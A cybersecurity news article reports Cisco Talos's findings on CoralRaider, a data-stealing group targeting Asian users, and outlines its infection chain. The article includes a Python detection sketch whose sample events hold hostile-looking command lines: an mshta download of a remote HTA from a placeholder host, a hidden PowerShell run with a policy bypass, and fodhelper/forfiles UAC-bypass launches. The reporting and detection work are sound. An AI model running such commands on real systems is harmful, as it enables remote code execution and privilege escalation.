Vietnamese Hackers Strike: CoralRaider Targets Asian Accounts

Paige Henley, Editor
Published on: April 6, 2024

Cisco Talos, a cybersecurity technology and information security company based in Maryland, recently uncovered a new cyber threat dubbed “CoralRaider”, believed to operate out of Vietnam and to be financially motivated.

Since around 2023, CoralRaider has been targeting individuals across various Asian and Southeast Asian countries including India, Bangladesh, China, Vietnam, South Korea, Indonesia, and others.

To carry out their schemes, CoralRaider employs sophisticated tools such as RotBot, a modified version of QuasarRAT, and the XClient stealer. Additionally, they use a technique called “dead drop,” hosting their malicious files on legitimate services to hide them in plain sight, along with rarely abused built-in Windows programs such as Forfiles.exe and FoDHelper.exe to evade detection.

The attack follows a simple process:

  1. The user opens a malicious Windows Shortcut (LNK) file.
  2. The file downloads and executes an HTML Application (HTA) file from an attacker-controlled download server.
  3. The HTA runs an embedded Visual Basic script that executes a PowerShell script in memory.
  4. The PowerShell script initiates three further scripts that bypass User Account Control (UAC), perform anti-VM and anti-analysis checks, and disable Windows notifications.
  5. Finally, it downloads and runs RotBot, which loads the XClient stealer.
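The chain above is visible to defenders as a sequence of parent/child process launches. The following detection sketch is an added example, not code from the article or from Cisco Talos: it correlates constructed, hypothetical process-creation events (not real telemetry) and flags the HTA host (mshta.exe, assumed here to be what launches the HTA) pulling a remote file, PowerShell spawned from it, and the two living-off-the-land binaries the article names being launched from PowerShell.

```python
"""Detection sketch for the shortcut -> remote HTA -> PowerShell -> LOLBin chain.

All events below are constructed samples; process names and the parent/child
rules are assumptions for illustration, not indicators from the article.
"""

# Constructed sample events: (pid, ppid, image name, command line).
SAMPLE_EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "mshta.exe", "mshta.exe http://download.example/invoice.hta"),
    (300, 200, "powershell.exe", "powershell.exe -w hidden -ep bypass -c ..."),
    (400, 300, "fodhelper.exe", "fodhelper.exe"),
    (500, 300, "forfiles.exe", "forfiles.exe /p C:\\Windows /m notepad.exe /c ..."),
    (600, 100, "mshta.exe", "mshta.exe C:\\Users\\u\\local.hta"),  # local HTA, no download
    (700, 100, "powershell.exe", "powershell.exe Get-Process"),     # ordinary admin use
]

# Built-in Windows programs the article says the group abuses.
LOLBINS = {"fodhelper.exe", "forfiles.exe"}


def flag_chain(events):
    """Return (pid, reason) pairs for events that match a stage of the chain."""
    by_pid = {pid: (ppid, image.lower(), cmd) for pid, ppid, image, cmd in events}
    findings = []
    for pid, (ppid, image, cmd) in by_pid.items():
        parent = by_pid.get(ppid, (None, "", ""))[1]
        # Stage 2: HTA host started from the shell with a remote URL argument.
        if image == "mshta.exe" and parent == "explorer.exe" and "://" in cmd.lower():
            findings.append((pid, "mshta.exe loading a remote HTA"))
        # Stage 3: PowerShell spawned by the HTA host (in-memory script stage).
        elif image == "powershell.exe" and parent == "mshta.exe":
            findings.append((pid, "powershell.exe spawned by mshta.exe"))
        # Stage 4: LOLBins launched from PowerShell (UAC bypass / evasion stage).
        elif image in LOLBINS and parent == "powershell.exe":
            findings.append((pid, f"{image} spawned by powershell.exe"))
    return findings


if __name__ == "__main__":
    for pid, reason in flag_chain(SAMPLE_EVENTS):
        print(pid, reason)
```

Each rule matches one stage on its own, so a hit on any single stage is worth triage, while the full sequence of hits across linked processes is the strong signal.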

The group uses XClient to steal many types of personal data including social media accounts (including those used for business and advertising), credentials, and financial data. This data is then used for financial gain, including sale to other bad actors.

“We found a few Telegram groups in Vietnamese named ‘Kiém tien tử Facebook,’ ‘Mua Bán Scan MINI,’ and ‘Mua Bán Scan Meta,’” Cisco Talos said. “Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded.”

The discovery of CoralRaider highlights the ever-evolving nature of cyber threats, particularly concerning financial cybercrime. With a focus on stealing sensitive information, this group poses a significant risk to individuals and organizations alike.


About the Author

Paige Henley is an editor at SafetyDetectives. She has three years of experience writing and editing various cybersecurity articles and blog posts about VPNs, antivirus software, and other data protection tools. As a freelancer, Paige enjoys working in a variety of content niches and is always expanding her knowledge base. When she isn't working as a "Safety Detective", she raises orphaned neonatal kittens, works on DIY projects around the house, and enjoys movie marathons on weekends with her husband and three cats.
